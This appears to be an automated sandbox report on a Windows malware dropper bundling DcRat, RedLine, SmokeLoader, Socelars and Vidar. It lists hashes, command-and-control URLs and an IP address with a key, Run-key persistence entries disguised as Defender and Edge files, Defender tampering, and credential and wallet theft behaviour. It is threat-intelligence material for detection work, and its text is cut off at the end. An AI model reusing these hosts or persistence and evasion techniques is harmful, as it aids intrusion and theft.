dcrat | 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31

Analysis

max time kernel
99s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
10-03-2022 20:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe
Size

4.2MB
MD5

256f52afa96f131dfdb397a93fb74852
SHA1

b2bebbce4a9804258cc4b6ad62a16cab80728587
SHA256

4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31
SHA512

0a3c4452cf1c1b6be951f5c9fe1da2b527ba47e1a1538d8d8566bb1188f442401a06187bb6ecaa939b954519dbc618fbed16e214acd58b53b081db46ba7a896d

Score

10^/10

dcrat onlylogger redline smokeloader socelars vidar dadad123 backdoor discovery evasion infostealer loader persistence rat spyware stealer trojan upx vmprotect

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.wygexde.xyz/

Extracted

Family

smokeloader

Version

2020

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

dadad123

86.107.197.196:63065

Attributes

auth_value
dd4834614a3ac04a7b90791c224626a2

Signatures

DcRat 10 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

Processes:

fhvct4NKRv1MuwyM8AyODJx_.exeschtasks.exeschtasks.exeschtasks.exepzyh.exeschtasks.exeschtasks.exe4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exeschtasks.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Windows Defender\\es-ES\\RuntimeBroker.exe\""	fhvct4NKRv1MuwyM8AyODJx_.exe
5932	schtasks.exe
4700	schtasks.exe
5340	schtasks.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e"	pzyh.exe
5940	schtasks.exe
484	schtasks.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe
4240	schtasks.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Admin\\My Documents\\conhost.exe\""	fhvct4NKRv1MuwyM8AyODJx_.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger

Process spawned unexpected child process 4 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4240	3884	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5940	3884	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	484	3884	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5932	3884	schtasks.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 12 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5476-398-0x0000000000DE0000-0x0000000001142000-memory.dmp	family_redline
behavioral2/memory/5476-394-0x0000000000DE0000-0x0000000001142000-memory.dmp	family_redline
behavioral2/memory/5476-393-0x0000000000DE0000-0x0000000001142000-memory.dmp	family_redline
behavioral2/memory/5476-403-0x0000000000DE0000-0x0000000001142000-memory.dmp	family_redline
behavioral2/memory/5852-412-0x0000000000A90000-0x0000000000DD5000-memory.dmp	family_redline
behavioral2/memory/5836-411-0x00000000003C0000-0x0000000000705000-memory.dmp	family_redline
behavioral2/memory/5836-426-0x00000000003C0000-0x0000000000705000-memory.dmp	family_redline
behavioral2/memory/5852-428-0x0000000000A90000-0x0000000000DD5000-memory.dmp	family_redline
behavioral2/memory/5852-431-0x0000000000A90000-0x0000000000DD5000-memory.dmp	family_redline
behavioral2/memory/5836-414-0x00000000003C0000-0x0000000000705000-memory.dmp	family_redline
behavioral2/memory/5476-406-0x0000000000DE0000-0x0000000001142000-memory.dmp	family_redline
behavioral2/memory/5288-405-0x0000000000080000-0x00000000000A0000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Installation.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Installation.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

OnlyLogger Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4268-172-0x0000000000700000-0x0000000000730000-memory.dmp	family_onlylogger
behavioral2/memory/4268-174-0x0000000000400000-0x00000000005E6000-memory.dmp	family_onlylogger
behavioral2/memory/5636-409-0x0000000000630000-0x0000000000674000-memory.dmp	family_onlylogger
behavioral2/memory/5636-419-0x0000000000400000-0x0000000000492000-memory.dmp	family_onlylogger

Downloads MZ/PE file

Executes dropped EXE 42 IoCs

Processes:

Files.exeKRSetp.exeFile.exeFolder.exeInfo.exeFile.exeInstall.exejg3_3uag.exepzyh.exeInstallation.exepub2.exejfiag3g_gg.exejfiag3g_gg.exeT0jlrpsGGUYr4eISutfzJGw3.exefhvct4NKRv1MuwyM8AyODJx_.exe8LYdi6ebdnfzHFB1_bWgzJGK.exevUSKLYkUlN7iZZdPiIOcfRq9.exe6mM5wc4MNICotg_rhaS83KUX.exeiCvrT7Kt4p0VQnPOaAK1bUuw.exehxK9HRML3gADcksTmKKPtJTV.exe3zrdpp1YNurQ9BvFo_I16hXV.exexnPfNBTqQGpxzwtTAJgl0Pwi.exeDyxVIXsNsKer_eZTImK_hMIG.exeXB562pl90hdu1ztAiENZv8ad.exegsRqUqtuYTRkYMiJYJ0ZdsHq.exextqmxtTKWEfE8t8uqfXbvBNB.exe9FJLQu4A_WqLnwf6TNi2ThAm.exe75BsMTOUWXlbqzaIQpyJ6if7.exeBJEsf_U8Nn986YcrD7DpuoI2.exeQM0VjrM43wjfbjwxlnNpeiLt.exeeYWJfcyLudf_is8eTK_AhCIG.exefindstr.exeInstall.exeKJAC6.exe3aa92756-575d-46ac-926b-6b220ed24ba3.exeBFE5C.exe57F2H.exeInstall.exe1CILB.exe1CILB33H9E8BCC5.execonhost.exeAccostarmi.exe.pif

pid	process
3616	Files.exe
3464	KRSetp.exe
3804	File.exe
3720	Folder.exe
988	Info.exe
4904	File.exe
4268	Install.exe
380	jg3_3uag.exe
5116	pzyh.exe
5080	Installation.exe
4636	pub2.exe
2716	jfiag3g_gg.exe
2964	jfiag3g_gg.exe
5404	T0jlrpsGGUYr4eISutfzJGw3.exe
5472	fhvct4NKRv1MuwyM8AyODJx_.exe
5476	8LYdi6ebdnfzHFB1_bWgzJGK.exe
5496	vUSKLYkUlN7iZZdPiIOcfRq9.exe
5536	6mM5wc4MNICotg_rhaS83KUX.exe
5596	iCvrT7Kt4p0VQnPOaAK1bUuw.exe
5636	hxK9HRML3gADcksTmKKPtJTV.exe
5704	3zrdpp1YNurQ9BvFo_I16hXV.exe
5736	xnPfNBTqQGpxzwtTAJgl0Pwi.exe
5832	DyxVIXsNsKer_eZTImK_hMIG.exe
5288	XB562pl90hdu1ztAiENZv8ad.exe
5836	gsRqUqtuYTRkYMiJYJ0ZdsHq.exe
5852	xtqmxtTKWEfE8t8uqfXbvBNB.exe
5412	9FJLQu4A_WqLnwf6TNi2ThAm.exe
5352	75BsMTOUWXlbqzaIQpyJ6if7.exe
6020	BJEsf_U8Nn986YcrD7DpuoI2.exe
3588	QM0VjrM43wjfbjwxlnNpeiLt.exe
4048	eYWJfcyLudf_is8eTK_AhCIG.exe
5432	findstr.exe
6076	Install.exe
5652	KJAC6.exe
5320	3aa92756-575d-46ac-926b-6b220ed24ba3.exe
648	BFE5C.exe
3440	57F2H.exe
5312	Install.exe
4252	1CILB.exe
5336	1CILB33H9E8BCC5.exe
1804	conhost.exe
2180	Accostarmi.exe.pif

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe	vmprotect
behavioral2/memory/380-150-0x0000000000400000-0x0000000000648000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exeFiles.exeFolder.exeFile.exe9FJLQu4A_WqLnwf6TNi2ThAm.exeiCvrT7Kt4p0VQnPOaAK1bUuw.exefhvct4NKRv1MuwyM8AyODJx_.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Files.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	File.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	9FJLQu4A_WqLnwf6TNi2ThAm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	iCvrT7Kt4p0VQnPOaAK1bUuw.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	fhvct4NKRv1MuwyM8AyODJx_.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Install.exe

Loads dropped DLL 15 IoCs

Processes:

pub2.exerUNdlL32.eXe75BsMTOUWXlbqzaIQpyJ6if7.exevUSKLYkUlN7iZZdPiIOcfRq9.exe

pid	process
4636	pub2.exe
3296	rUNdlL32.eXe
5352	75BsMTOUWXlbqzaIQpyJ6if7.exe
5352	75BsMTOUWXlbqzaIQpyJ6if7.exe
5352	75BsMTOUWXlbqzaIQpyJ6if7.exe
5352	75BsMTOUWXlbqzaIQpyJ6if7.exe
5352	75BsMTOUWXlbqzaIQpyJ6if7.exe
5352	75BsMTOUWXlbqzaIQpyJ6if7.exe
5352	75BsMTOUWXlbqzaIQpyJ6if7.exe
5352	75BsMTOUWXlbqzaIQpyJ6if7.exe
5352	75BsMTOUWXlbqzaIQpyJ6if7.exe
5352	75BsMTOUWXlbqzaIQpyJ6if7.exe
5352	75BsMTOUWXlbqzaIQpyJ6if7.exe
5496	vUSKLYkUlN7iZZdPiIOcfRq9.exe
5496	vUSKLYkUlN7iZZdPiIOcfRq9.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

fhvct4NKRv1MuwyM8AyODJx_.exe57F2H.exepzyh.exemsedge.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.VisualElementsManifest\\msedge.exe\""	fhvct4NKRv1MuwyM8AyODJx_.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe"	57F2H.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e"	pzyh.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Windows Defender\\es-ES\\RuntimeBroker.exe\""	fhvct4NKRv1MuwyM8AyODJx_.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Admin\\My Documents\\conhost.exe\""	fhvct4NKRv1MuwyM8AyODJx_.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\System32\\cmmon32\\conhost.exe\""	fhvct4NKRv1MuwyM8AyODJx_.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

jg3_3uag.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg3_3uag.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

10 ipinfo.io
11 ipinfo.io
16 ip-api.com
264 ipinfo.io
265 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg3_3uag.exe

flow	ioc
10	ipinfo.io
11	ipinfo.io
16	ip-api.com
264	ipinfo.io
265	ipinfo.io

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe	autoit_exe

Drops file in System32 directory 3 IoCs

Processes:

Install.exefhvct4NKRv1MuwyM8AyODJx_.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File created	C:\Windows\SysWOW64\cmmon32\conhost.exe	fhvct4NKRv1MuwyM8AyODJx_.exe
File created	C:\Windows\SysWOW64\cmmon32\088424020bedd6	fhvct4NKRv1MuwyM8AyODJx_.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs

Processes:

8LYdi6ebdnfzHFB1_bWgzJGK.exefhvct4NKRv1MuwyM8AyODJx_.exegsRqUqtuYTRkYMiJYJ0ZdsHq.exextqmxtTKWEfE8t8uqfXbvBNB.exeQM0VjrM43wjfbjwxlnNpeiLt.exefindstr.exeKJAC6.exeBFE5C.exe57F2H.execonhost.exe

pid	process
5476	8LYdi6ebdnfzHFB1_bWgzJGK.exe
5472	fhvct4NKRv1MuwyM8AyODJx_.exe
5836	gsRqUqtuYTRkYMiJYJ0ZdsHq.exe
5852	xtqmxtTKWEfE8t8uqfXbvBNB.exe
3588	QM0VjrM43wjfbjwxlnNpeiLt.exe
5472	fhvct4NKRv1MuwyM8AyODJx_.exe
5432	findstr.exe
5652	KJAC6.exe
648	BFE5C.exe
3440	57F2H.exe
1804	conhost.exe
1804	conhost.exe
1804	conhost.exe

Drops file in Program Files directory 7 IoCs

Processes:

setup.exefhvct4NKRv1MuwyM8AyODJx_.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220310220156.pma	setup.exe
File created	C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe	fhvct4NKRv1MuwyM8AyODJx_.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe	fhvct4NKRv1MuwyM8AyODJx_.exe
File created	C:\Program Files (x86)\Windows Defender\es-ES\9e8d7a4ca61bd9	fhvct4NKRv1MuwyM8AyODJx_.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.VisualElementsManifest\msedge.exe	fhvct4NKRv1MuwyM8AyODJx_.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.VisualElementsManifest\61a52ddc9dd915	fhvct4NKRv1MuwyM8AyODJx_.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\82ae69f7-c77e-45e8-8dca-f53e134cfbb5.tmp	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 22 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1284	3296	WerFault.exe	rUNdlL32.eXe
5584	5404	WerFault.exe	T0jlrpsGGUYr4eISutfzJGw3.exe
3188	5536	WerFault.exe	6mM5wc4MNICotg_rhaS83KUX.exe
648	5636	WerFault.exe	hxK9HRML3gADcksTmKKPtJTV.exe
5944	5736	WerFault.exe	xnPfNBTqQGpxzwtTAJgl0Pwi.exe
836	5404	WerFault.exe	T0jlrpsGGUYr4eISutfzJGw3.exe
2028	5536	WerFault.exe	6mM5wc4MNICotg_rhaS83KUX.exe
3120	5636	WerFault.exe	hxK9HRML3gADcksTmKKPtJTV.exe
3180	5736	WerFault.exe	xnPfNBTqQGpxzwtTAJgl0Pwi.exe
3244	5636	WerFault.exe	hxK9HRML3gADcksTmKKPtJTV.exe
5264	5636	WerFault.exe	hxK9HRML3gADcksTmKKPtJTV.exe
1688	5636	WerFault.exe	hxK9HRML3gADcksTmKKPtJTV.exe
1848	5636	WerFault.exe	hxK9HRML3gADcksTmKKPtJTV.exe
5472	5636	WerFault.exe	hxK9HRML3gADcksTmKKPtJTV.exe
5244	5636	WerFault.exe	hxK9HRML3gADcksTmKKPtJTV.exe
5264	5636	WerFault.exe	hxK9HRML3gADcksTmKKPtJTV.exe
5776	4488	WerFault.exe	explorer.exe
6072	1688	WerFault.exe	explorer.exe
1308	4528	WerFault.exe	notepad.exe
2648	5912	WerFault.exe	notepad.exe
5840	5912	WerFault.exe	notepad.exe
6088	4528	WerFault.exe	notepad.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

75BsMTOUWXlbqzaIQpyJ6if7.exe3aa92756-575d-46ac-926b-6b220ed24ba3.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	75BsMTOUWXlbqzaIQpyJ6if7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	75BsMTOUWXlbqzaIQpyJ6if7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	3aa92756-575d-46ac-926b-6b220ed24ba3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	3aa92756-575d-46ac-926b-6b220ed24ba3.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

484 schtasks.exe
5932 schtasks.exe
4700 schtasks.exe
5340 schtasks.exe
4240 schtasks.exe
5940 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5704 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

5956 tasklist.exe
5400 tasklist.exe

pid	process
484	schtasks.exe
5932	schtasks.exe
4700	schtasks.exe
5340	schtasks.exe
4240	schtasks.exe
5940	schtasks.exe

pid	process
5704	timeout.exe

pid	process
5956	tasklist.exe
5400	tasklist.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeInstall.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

2300 taskkill.exe
4680 taskkill.exe
5688 taskkill.exe

pid	process
2300	taskkill.exe
4680	taskkill.exe
5688	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

1CILB33H9E8BCC5.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	1CILB33H9E8BCC5.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	1CILB33H9E8BCC5.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync	1CILB33H9E8BCC5.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	1CILB33H9E8BCC5.exe

Modifies registry class 5 IoCs

Processes:

Folder.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Folder.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exemsedge.exemsedge.exejfiag3g_gg.exemsedge.exe

pid	process
4636	pub2.exe
4636	pub2.exe
4504	msedge.exe
4504	msedge.exe
4344	msedge.exe
4344	msedge.exe
2964	jfiag3g_gg.exe
2964	jfiag3g_gg.exe
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
5096	msedge.exe
5096	msedge.exe
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232
2232

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

4636 pub2.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

msedge.exe

pid process

5096 msedge.exe
5096 msedge.exe
5096 msedge.exe
5096 msedge.exe
5096 msedge.exe

pid	process
5096	msedge.exe
5096	msedge.exe
5096	msedge.exe
5096	msedge.exe
5096	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

KRSetp.exeInstallation.exetaskkill.exeInfo.exe

description	pid	process
Token: SeDebugPrivilege	3464	KRSetp.exe
Token: SeCreateTokenPrivilege	5080	Installation.exe
Token: SeAssignPrimaryTokenPrivilege	5080	Installation.exe
Token: SeLockMemoryPrivilege	5080	Installation.exe
Token: SeIncreaseQuotaPrivilege	5080	Installation.exe
Token: SeMachineAccountPrivilege	5080	Installation.exe
Token: SeTcbPrivilege	5080	Installation.exe
Token: SeSecurityPrivilege	5080	Installation.exe
Token: SeTakeOwnershipPrivilege	5080	Installation.exe
Token: SeLoadDriverPrivilege	5080	Installation.exe
Token: SeSystemProfilePrivilege	5080	Installation.exe
Token: SeSystemtimePrivilege	5080	Installation.exe
Token: SeProfSingleProcessPrivilege	5080	Installation.exe
Token: SeIncBasePriorityPrivilege	5080	Installation.exe
Token: SeCreatePagefilePrivilege	5080	Installation.exe
Token: SeCreatePermanentPrivilege	5080	Installation.exe
Token: SeBackupPrivilege	5080	Installation.exe
Token: SeRestorePrivilege	5080	Installation.exe
Token: SeShutdownPrivilege	5080	Installation.exe
Token: SeDebugPrivilege	5080	Installation.exe
Token: SeAuditPrivilege	5080	Installation.exe
Token: SeSystemEnvironmentPrivilege	5080	Installation.exe
Token: SeChangeNotifyPrivilege	5080	Installation.exe
Token: SeRemoteShutdownPrivilege	5080	Installation.exe
Token: SeUndockPrivilege	5080	Installation.exe
Token: SeSyncAgentPrivilege	5080	Installation.exe
Token: SeEnableDelegationPrivilege	5080	Installation.exe
Token: SeManageVolumePrivilege	5080	Installation.exe
Token: SeImpersonatePrivilege	5080	Installation.exe
Token: SeCreateGlobalPrivilege	5080	Installation.exe
Token: 31	5080	Installation.exe
Token: 32	5080	Installation.exe
Token: 33	5080	Installation.exe
Token: 34	5080	Installation.exe
Token: 35	5080	Installation.exe
Token: SeDebugPrivilege	2300	taskkill.exe
Token: SeShutdownPrivilege	2232
Token: SeCreatePagefilePrivilege	2232
Token: SeShutdownPrivilege	2232
Token: SeCreatePagefilePrivilege	2232
Token: SeShutdownPrivilege	2232
Token: SeCreatePagefilePrivilege	2232
Token: SeShutdownPrivilege	2232
Token: SeCreatePagefilePrivilege	2232
Token: SeShutdownPrivilege	2232
Token: SeCreatePagefilePrivilege	2232
Token: SeShutdownPrivilege	2232
Token: SeCreatePagefilePrivilege	2232
Token: SeShutdownPrivilege	2232
Token: SeCreatePagefilePrivilege	2232
Token: SeDebugPrivilege	988	Info.exe
Token: SeShutdownPrivilege	2232
Token: SeCreatePagefilePrivilege	2232
Token: SeShutdownPrivilege	2232
Token: SeCreatePagefilePrivilege	2232
Token: SeShutdownPrivilege	2232
Token: SeCreatePagefilePrivilege	2232
Token: SeShutdownPrivilege	2232
Token: SeCreatePagefilePrivilege	2232
Token: SeShutdownPrivilege	2232
Token: SeCreatePagefilePrivilege	2232
Token: SeShutdownPrivilege	2232
Token: SeCreatePagefilePrivilege	2232
Token: SeShutdownPrivilege	2232

Suspicious use of FindShellTrayWindow 24 IoCs

Processes:

File.exemsedge.exeAccostarmi.exe.pif

